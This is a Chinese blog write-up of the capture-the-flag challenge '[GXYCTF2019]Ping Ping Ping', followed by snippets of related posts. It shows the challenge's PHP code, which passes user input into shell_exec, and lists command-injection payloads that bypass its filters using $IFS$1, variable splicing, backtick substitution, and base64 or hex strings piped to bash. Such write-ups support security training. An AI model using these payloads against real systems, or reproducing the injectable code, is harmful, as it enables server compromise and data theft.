[GXYCTF2019]Ping Ping Ping

最新推荐文章于 2024-04-26 22:18:35 发布
最新推荐文章于 2024-04-26 22:18:35 发布
阅读量2.4k 收藏 1
点赞数
文章标签: php shell linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/miuzzx/article/details/104617234
版权

题目地址:https://buuoj.cn/challenges
打开题目发现提示输入ip,发现应该是个命令执行,源码中应该是exec()、shell_exec()之类的函数,然后传入 ping + ip,我们首先尝试 ?ip=1;ls发现flag.php、index.php.尝试打开flag.php发现存在过滤,几次尝试之后发现过滤了flag 空格 还有一些符号,空格有很多种代替方法。
%20、%09、$IFS$1、${IFS}、<>、<还可以用{} 比如 {cat,flag},这里发现$IFS$1可以使用。
我们首先打开index.php查看一下过滤,代码如下

|\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match)){
    echo preg_match("/\&|\/|\?|\*|\<|[\x{00}-\x{20}]|\>|\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match);
    die("fxck your symbol!");
  } else if(preg_match("/ /", $ip)){
    die("fxck your space!");
  } else if(preg_match("/bash/", $ip)){
    die("fxck your bash!");
  } else if(preg_match("/.*f.*l.*a.*g.*/", $ip)){
    die("fxck your flag!");
  }
  $a = shell_exec("ping -c 4 ".$ip);

如果没有这些过滤,我们列一下可以使用的方法。

  1. 拼接flag 1;a=fl;b=ag.php;cat $a$b
    其中有这么一条过滤方法,我们用上述方法无法绕过,但是我们只要改变一下顺序就可以: 1;a=ag.php;b=fl;cat $b$a绕过空格就用上面提到的$IFS$1完整的payload 1;a=ag.php;b=fl;cat$IFS$1$b$a
else if(preg_match("/.*f.*l.*a.*g.*/", $ip)){die("fxck your flag!");}

2.内联执行绕过
payload: cat$IFS$1`ls`
使用内联执行会将 ``内的输出作为前面命令的输入,当我们输入上述payload时,等同于cat falg.php;cat index.php

3编码绕过
base64:

echo YWJjZGU=|base64 -d //打印出来abcde
echo Y2F0IGZhbGcucGhw|base64 -d|bash //cat flag.php (sh)

hex:
echo 63617420666c61672e706870 | xxd -r -p|bash //cat flag.php

oct:

$(printf “\154\163”) //ls
$(printf “\x63\x61\x74\x20\x66\x6c\x61\x67\x2e\x70\x68\x70”) //cat flag.php
但这种方法因为过滤的原因这这个题上无法实现。

对于关键字还可以用单引号和反斜杠绕过 比如 cat fl’'ag cat fl\ag
总结一下,这题可用的payload1;a=ag.php;b=fl;cat$IFS$1$b$a和 cat$IFS$1`ls`
得到的flag查看源码。

补充:当 /被过滤可以使用
在这里插入图片描述

yu22x
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
[GXYCTF2019]Ping Ping Ping1
weixin_61021815的博客
05-14 1592
进入页面没有什么东西,尝试填一下ip 可以 使用多命令执行符 ; 无论逻辑 && 命令1正确则命令2执行,命令1错误则命令2不执行 || 命令1错误命令2执行,命令2错误则命令1执行 构造?ip=127.0.0.1 ;ls 构造?ip=127.0.0.1;cat flag.php 发现存在过滤 空格 想办法绕过一下 1.${IFS} 2.$IFS$1 3.${IFS 4.%20 5.<和<>重定向符替换 6.%09替换 注:...
Linux批量pingIP地址
最新发布
05-17
Linux系统中,通过shell脚本读取IP列表,进行批量ping操作,并记录结果
BUUCTF[GXYCTF2019]PingPingPing
weixin_45253622的博客
05-06 465
测试:?ip=127.0.0.1 测试:?ip=1&whoami 怀疑&被过滤,使用;替代: 发现可以,然后我们看看ls ?ip=1;ls 测试:/?ip=1;cat /flag 被过滤掉了,但是我们不知道什么
ctf-ping命令执行
qq_45414878的博客
11-08 9500
[GXYCTF2019]Ping Ping Ping 现在做一下关于常见的绕过ping执行其他命令的姿势,启动环境,连接并输入参数,查看当前目录下都有什么 ls命令没有被过滤,并且知道flag就在这个目录下面,用cat查看的flag的时候发现空格被禁用,绕过空格常用的方法有 {cat,flag.php} cat${IFS}flag.php cat$IFS$9flag.php cat<flag.php cat<>flag.php kg=$'\x20flag.php'&&c
[GXYCTF 2019]Ping Ping Ping
2301_80358831的博客
04-26 295
命令执行的绕过姿势,本题主要还是使用空格绕过的方法进行解题
CTFping命令绕过及符号用法
Hardworking666的博客
10-13 9873
文章目录一、pandas是什么?二、使用步骤1.引入库2.读入数据总结 一、pandas是什么? 示例:pandas 是基于NumPy 的一种工具,该工具是为了解决数据分析任务而创建的。 二、使用步骤 1.引入库 代码如下(示例): import numpy as np import pandas as pd import matplotlib.pyplot as plt import seaborn as sns import warnings warnings.filterwarnings('ig..
BUUCTF—[GXYCTF2019]Ping Ping Ping1
qq_57778984的博客
10-22 326
内联绕过就是将反引号内命令的输出结果作为另一个命令的输入来执行,比如系统对flag字符进行了过滤,但是单独使用ls命令时又会回显出index.php和flag.php文件,那么我们可以通过ls命令将index.php和flag.php作为输入,通过cat查看两个文件获取flag,而不用输入cat flag.php触发关键词。3.尝试在执行ping命令后执行其他命令,用";连接两个命令时,第二个命令只有在第一个命令执行成功的情况下才会执行。连接两个命令时,第二个命令只有在第一个命令执行失败的情况下才会执行。
批量PingTelnet检测
12-25
批量Ping和Telnet检测是网络管理员常用的两种网络连通性检查工具,它们在IT领域中扮演着重要角色,尤其在大型网络环境中。批量检测能够大大提高工作效率,帮助快速定位网络问题。 **批量Ping检测** 批量Ping检测是...
PINGtest_ping_
09-28
标题"PINGtest_ping_"指的是一个用于测试网络连通性的工具,特别关注于使用"ping"命令来检查IP地址的可达性。"ping"是互联网控制报文协议(ICMP)的一部分,它允许网络设备发送“回显请求”到目标IP地址,然后接收...
ping工具.zip
03-19
"长ping工具.zip"是一个压缩包,其中包含了一个专门用于执行长时间ping操作的工具。这个工具不仅能够持续ping指定的IP地址,而且还能详细记录每次ping请求的响应时间和结果,这对于网络故障排查、网络延迟分析以及...
局域网IP PING测试工具
12-20
1.需运行在64位操作系统(直接上传exe有问题,放压缩文件中重新上传) 2.局域网IP PING测试工具,方便快速查询已使用,未使用的IP地址 3.例如输入192.168.168.10, 则从192.168.168.10开始,一直检测到192.168.168.254
PING.rar_ping
07-14
标题"PING.rar_ping"指的是一个压缩包文件,其中包含了一个简易版的ping程序。这个程序在功能上类似于我们在操作系统命令行环境中常用的`ping`命令,主要用于网络诊断和测试。通过发送Internet控制消息协议(ICMP)...
ping.zip_ping
07-14
标题中的"ping.zip_ping"可能是指与网络诊断工具"Ping"相关的资料,而"平均.doc"可能是文档中探讨了如何使用平均差法来分析和理解"Ping"命令的响应时间。接下来,我们将深入探讨"Ping"命令以及平均差法在网络诊断中...
Ping.rar_ping
07-14
【标题】"Ping.rar_ping" 是一个压缩包文件,其中包含有关微软的Ping命令的源代码。Ping命令是网络诊断工具中的基本元素,用于检查网络连接的可达性和响应时间。这个压缩包为学习和理解Ping命令的工作原理提供了宝贵...
LabVIEW实现网络Ping IP测试
07-10
在这个“LabVIEW实现网络Ping IP测试”的项目中,我们可以通过LabVIEW编写程序来模拟操作系统中的ping命令,对指定的IP地址进行连通性检测。 **一、LabVIEW基础知识** 1. **图形化编程**:LabVIEW采用G语言...
python实现ping的方法
09-21
Python实现ping功能主要是通过发送和接收ICMP(Internet Control Message Protocol)回显请求(ICMP_ECHO_REQUEST,类型为8)来实现的。以下是一个简单的Python脚本,它使用socket和struct模块来构建和解析ICMP...
经典ctf ping题目详解 青少年CTF-WEB-PingMe02
m0_73734159的博客
11-18 1422
如果想效率更更高,我们还可以自己生成Linux常见列出目录文件和查看文件等命令和常用字符以及关键字的字典,并使用BurpSuite进行爆破查看那个命令和字符以及关键字的过滤情况。'作为命令之间的连接符,当上一个命令完成后,继续执行下一个命令。当然Linux系统查看文件内容的命令还有很多,这里就举着三个例子了。因为f开头的文件只有flag这一个文件,所以查的就是flag。cat是Linux系统里面最常见的查看文件内容的命令。ls是Linux系统里面的列出目录文件的命令。查看根目录下flag文件的内容。
buuctf-Ping Ping Ping
m0_52432374的博客
03-13 514
buuctf-Ping Ping Ping 先尝试?ip=127.0.0.1&ls 发现不行 尝试?ip=127.0.0.1|ls,发现可以
buuctfPing Ping Ping(命令执行)
zzqzzq11的博客
08-06 1319
buuctf

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

yu22x

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值